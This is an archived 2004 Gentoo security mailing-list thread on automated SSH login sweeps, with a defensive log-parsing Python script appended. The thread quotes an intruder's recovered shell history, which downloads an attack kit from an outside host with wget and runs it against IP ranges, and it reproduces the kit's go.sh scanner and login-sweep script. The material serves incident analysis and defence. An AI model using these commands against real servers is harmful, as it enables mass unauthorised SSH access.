Gentoo Archives: gentoo-security

From: Jan Dusek <j.d@×××××××××.cz>
To: gentoo-security@l.g.o
Subject: Re: [gentoo-security] [Fwd: [Full-Disclosure] Re: Automated SSH login attempts?]
Date: Fri, 30 Jul 2004 07:38:10
Message-Id: 4109FABF.4010207@most.ujep.cz
In Reply to: Re: [gentoo-security] [Fwd: [Full-Disclosure] Re: Automated SSH login attempts?] by Rui Pedro Figueira Covelo
That certainly is a good point. On the other hand I have this in the log
of one of my machines:

Jul 27 2004 14:38 GMT:

Failed password for illegal user test from 220.80.108.73 port 60972 ssh2
Failed password for root from 220.80.108.73 port 60902 ssh2
Failed password for root from 220.80.108.73 port 60825 ssh2
Failed password for root from 220.80.108.73 port 60742 ssh2
Failed password for illegal user user from 220.80.108.73 port 60670 ssh2
Failed password for illegal user admin from 220.80.108.73 port 60584 ssh2
Failed password for illegal user admin from 220.80.108.73 port 60515 ssh2
Failed password for illegal user guest from 220.80.108.73 port 60419 ssh2
Failed password for illegal user test from 220.80.108.73 port 60339 ssh2


Jul 20 2004 16:20 GMT:

Failed password for illegal user test from 131.234.157.10 port 37301 ssh2
Failed password for root from 131.234.157.10 port 37284 ssh2
Failed password for root from 131.234.157.10 port 37253 ssh2
Failed password for root from 131.234.157.10 port 37267 ssh2
Failed password for illegal user admin from 131.234.157.10 port 37210 ssh2
Failed password for illegal user admin from 131.234.157.10 port 37191 ssh2
Failed password for illegal user user from 131.234.157.10 port 37229 ssh2
Failed password for illegal user test from 131.234.157.10 port 37133 ssh2
Failed password for illegal user guest from 131.234.157.10 port 37164 ssh2


And something similar on Jul 20 2004 01:10 GMT from 66.250.111.33.

I'm wondering if it has anything to do with these ssh probes. I'm
getting the 'guest and test' probes as well, but far more recently
(starting Jul 28).

Please note that there are root attempts as well in the logs. Also
please note that every time there are 2 admin, 3 root, 2 test, 1 user and
1 guest attempts, so it looks like a simple dictionary attack with some
basic empty/weak passwords.

It's just a wild guess but could it be that there are 2 stages of this
'thing'?

Hope it helps...

--jd

Rui Pedro Figueira Covelo wrote:
> I noticed that the .bash_history it's from the root account. Not guest
> or test. If this .bash_history is real, the fact that someone got root
> proves that someone used an exploit rather than guessing a weak password
> of a guest or test account, right?
>
> Dan Margolis wrote:
> | I grabbed the tgz before it's too late. I plan on running it with a
> | sniffer so I can see what it's doing--that should indicate whether it's
> | really using some unknown ssh exploit (I'm afraid I'm not a whiz at
> | disassembly, so I'd rather not take that route). I tend to think it's
> | not; there was an OpenSSH vuln a while back that this guy's Debian
> | machine might still be vulnerable to, if it wasn't patched in a year. If
> | there were an unknown vulnerability, he'd be having a lot more success
> | and we'd be seeing this a whole lot more (unless we're all rooted and
> | don't know it).
> |
> | Anyone have any more information on this?
> |
> | -------- Original Message --------
> |
> | From: Stefan Janecek <stefan.janecek@×××.at>
> | To: full-disclosure@××××××××××××.com
> |
> | Hmmm - I have also been getting those login attempts, but thought them to
> | be harmless. Maybe they are not *that* harmless, though... Today I
> | managed to get my hands on a machine that was originating such login
> | attempts. I must admit I am far from being a linux security expert, but
> | this is what I've found out up to now:
> |
> | Whoever broke into the machine did not take any attempts to cover up his
> | tracks - this is what I found in /root/.bash_history:
> |
> | ------
> | id
> | uname -a
> | w
> | id
> | ls
> | wgte frauder.us/linux/ssh.tgz
> | wget frauder.us/linux/ssh.tgz
> | tar xzvf ssh.tgz
> | tar xvf ssh.tgz
> | ls
> | cd ssh
> | ls
> | ./go.sh 195.178
> | ls
> | pico uniq.txt
> | vi uniq.txt
> | ls
> | rm -rf uniq.txt
> | ./go.sh 167.205
> | ls
> | rm -rf uniq.txt vuln.txt
> | ./go.sh 202.148.20
> | ./go.sh 212.92
> | ./go.sh 195.197
> | ./go.sh 147.32
> | ./go.sh 213.168
> | ./go.sh 134.176
> | ./go.sh 195.83
> | ------
> |
> | um-hum. I downloaded 'ssh.tgz', it contains the script go.sh and two
> | binaries:
> |
> | go.sh:
> | -------
> | ./ss 22 -b $1 -i eth0 -s 6
> | cat bios.txt |sort | uniq > uniq.txt
> | ./sshf
> | -------
> |
> | * 'ss' apparently is some sort of portscanner
> | * 'sshf' connects to every IP in uniq.txt and tries to log in as user
> | 'test' first, then as user 'guest' (according to tcpdump).
> |
> | This does not seem to be a stupid brute force attack, as there is only
> | one login attempt per user. Could it be that the tool tries to exploit
> | some vulnerability in the sshd, and just tries to look harmless by using
> | 'test' and 'guest' as usernames?
> |
> | The compromised machine was running an old debian woody installation
> | which had not been upgraded for at least one year, the sshd version
> | string says 'OpenSSH_3.6.1p2 Debian 1:3.6.1p2-10'
> |
> | As already mentioned, I am far from being an expert, but if I can assist
> | in further testing, then let me know. Please CC me, I am not subscribed
> | to the list.
> |
> | cheers,
> | Stefan
> |
> | _______________________________________________
> | Full-Disclosure - We believe in it.
> | Charter: http://lists.netsys.com/full-disclosure-charter.html
> |
> | --
> | Dan ("KrispyKringle")
> | Gentoo Linux Security Coordinator
>
> --
> gentoo-security@g.o mailing list
>

--
gentoo-security@g.o mailing list
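The observation in the message above (every probing source tries 2 admin, 3 root, 2 test, 1 user and 1 guest logins) is the kind of per-source fingerprint a defender can compute automatically from sshd's auth log. The following script is an added example written for this archive page; it is not code from any participant in the thread or from the tools they discuss. It parses "Failed password" lines, builds a per-source count of usernames tried, flags sources that sweep several accounts, and groups flagged sources whose attempt pattern is identical, which is what suggests one scripted tool behind several IPs. The sample log is constructed from the lines quoted in the message (timestamps were not included there, so none are parsed); the "invalid user" alternative in the regex covers the wording later OpenSSH releases use instead of "illegal user".

```python
import re
from collections import Counter, defaultdict

# Constructed sample input: the sshd failure lines quoted in the message above.
# The two date headers are kept to show that non-matching lines are skipped.
SAMPLE_LOG = """\
Jul 27 2004 14:38 GMT:
Failed password for illegal user test from 220.80.108.73 port 60972 ssh2
Failed password for root from 220.80.108.73 port 60902 ssh2
Failed password for root from 220.80.108.73 port 60825 ssh2
Failed password for root from 220.80.108.73 port 60742 ssh2
Failed password for illegal user user from 220.80.108.73 port 60670 ssh2
Failed password for illegal user admin from 220.80.108.73 port 60584 ssh2
Failed password for illegal user admin from 220.80.108.73 port 60515 ssh2
Failed password for illegal user guest from 220.80.108.73 port 60419 ssh2
Failed password for illegal user test from 220.80.108.73 port 60339 ssh2
Jul 20 2004 16:20 GMT:
Failed password for illegal user test from 131.234.157.10 port 37301 ssh2
Failed password for root from 131.234.157.10 port 37284 ssh2
Failed password for root from 131.234.157.10 port 37253 ssh2
Failed password for root from 131.234.157.10 port 37267 ssh2
Failed password for illegal user admin from 131.234.157.10 port 37210 ssh2
Failed password for illegal user admin from 131.234.157.10 port 37191 ssh2
Failed password for illegal user user from 131.234.157.10 port 37229 ssh2
Failed password for illegal user test from 131.234.157.10 port 37133 ssh2
Failed password for illegal user guest from 131.234.157.10 port 37164 ssh2
"""

# "illegal user" is the OpenSSH 3.x wording seen on this page; later releases
# log "invalid user" for accounts that do not exist. Both mark a nonexistent account.
FAILED_RE = re.compile(
    r"Failed password for (?P<nonexistent>(?:illegal|invalid) user )?(?P<user>\S+) "
    r"from (?P<src>\d{1,3}(?:\.\d{1,3}){3}) port (?P<port>\d+)"
)


def parse_failures(text):
    """Return one (src_ip, username, account_is_nonexistent) tuple per failed-login line."""
    events = []
    for line in text.splitlines():
        m = FAILED_RE.search(line)
        if m is None:
            continue  # date headers, successful logins, unrelated lines
        events.append((m.group("src"), m.group("user"), m.group("nonexistent") is not None))
    return events


def fingerprint_sources(events):
    """Map each source IP to a Counter of the usernames it tried."""
    per_src = defaultdict(Counter)
    for src, user, _nonexistent in events:
        per_src[src][user] += 1
    return per_src


def count_nonexistent(events):
    """Map each source IP to how many of its attempts targeted accounts that do not exist."""
    counts = Counter()
    for src, _user, nonexistent in events:
        if nonexistent:
            counts[src] += 1
    return counts


def flag_dictionary_sweeps(per_src, min_users=3, min_attempts=5):
    """Flag sources that tried several distinct accounts: a scripted account sweep,
    not a user mistyping one password. Thresholds are assumptions for this example."""
    flagged = {}
    for src, users in per_src.items():
        if len(users) >= min_users and sum(users.values()) >= min_attempts:
            # A sorted tuple of (username, attempts) is the source's pattern signature.
            flagged[src] = tuple(sorted(users.items()))
    return flagged


def group_by_pattern(flagged):
    """Group flagged sources whose per-username attempt counts are identical;
    identical patterns from different IPs point to the same tool."""
    groups = defaultdict(list)
    for src, pattern in flagged.items():
        groups[pattern].append(src)
    return {pattern: sorted(srcs) for pattern, srcs in groups.items()}


if __name__ == "__main__":
    events = parse_failures(SAMPLE_LOG)
    per_src = fingerprint_sources(events)
    nonexistent = count_nonexistent(events)
    flagged = flag_dictionary_sweeps(per_src)
    for pattern, srcs in group_by_pattern(flagged).items():
        desc = ", ".join(f"{n} {user}" for user, n in pattern)
        print(f"pattern [{desc}] seen from {len(srcs)} source(s): {', '.join(srcs)}")
    for src in sorted(per_src):
        print(f"{src}: {sum(per_src[src].values())} attempts, "
              f"{nonexistent[src]} against nonexistent accounts")
```

Run on the quoted log the script reports a single pattern (2 admin, 1 guest, 3 root, 2 test, 1 user) shared by both source addresses, which is the observation the message makes by hand. Feeding it a real auth log (for example the output of `grep 'Failed password' /var/log/auth.log`) gives the same grouping across every probing source, and the nonexistent-account count separates scripted account sweeps from failed logins against accounts that actually exist.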